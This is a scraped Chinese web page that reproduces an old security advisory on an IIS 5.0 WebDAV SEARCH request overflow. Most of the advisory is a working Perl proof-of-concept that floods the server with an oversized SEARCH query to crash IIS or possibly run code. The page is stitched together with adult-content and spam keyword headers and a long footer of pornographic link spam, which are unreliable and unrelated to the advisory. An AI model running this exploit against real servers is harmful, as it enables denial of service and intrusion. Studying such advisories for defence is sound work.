六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

IIS 處理 SEARCH 請求漏洞

[摘要]涉及程序: IIS 描述: 通過構(gòu)造特殊的 SEARCH 請求導(dǎo)致 IIS 執(zhí)行攻擊者代碼漏洞 詳細: 發(fā)現(xiàn) IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構(gòu)造特殊的 IIS ...
涉及程序:
IIS
  
描述:
通過構(gòu)造特殊的 SEARCH 請求導(dǎo)致 IIS 執(zhí)行攻擊者代碼漏洞
  
詳細:
發(fā)現(xiàn) IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構(gòu)造特殊的 IIS SEARCH 請求能重啟與 IIS 相關(guān)的所有服務(wù),而且可能遠程執(zhí)行任意代碼。

以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當?shù)耐緩秸埡蠊载?br>


Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影響系統(tǒng):
IIS 5.0  



主站蜘蛛池模板: 色倩网站| 日不卡| 亚洲国产乱码在线精品 | 天堂最新版资源www在线 | 最新精品亚洲成a人在线观看 | 亚洲视频二区 | 日韩欧美视频在线 | 日产精品一区二区 | 欧美夜色 | 日日夜夜人人 | 亚洲综合站| 亚洲精品在线免费 | 色九九视频 | 日本一区二区高清免费不卡 | 青娱乐精品视频 | 日本一区二区三区中文字幕视频 | 手机在线观看亚洲国产精品 | 欧美视频免费在线播放 | 青青草成人免费在线视频 | 日本免费观看日本高清视频 | 亚洲成人xxx| 婷婷97狠狠的狠狠的爱 | 在线播放亚洲视频 | 日韩精品一区二区三区免费视频 | 亚欧在线精品免费观看一区 | 天天爱天天做久久天天狠狼 | 视频一区在线播放 | 天天天天做夜夜夜夜 | 日韩爱爱片| 青青在线视频免费观看 | 三级黄色片在线观看 | 欧美写真视频一区 | 亚洲国产日韩综合久久精品 | 青草视频在线观看免费视频 | 日韩欧美在线观看 | 亚洲最大毛片 | 日本一片免费观看高清完整 | 日韩毛片久久91 | 青娱乐视觉盛宴在线视频 | 婷婷中文在线 | 亚洲免费观看 |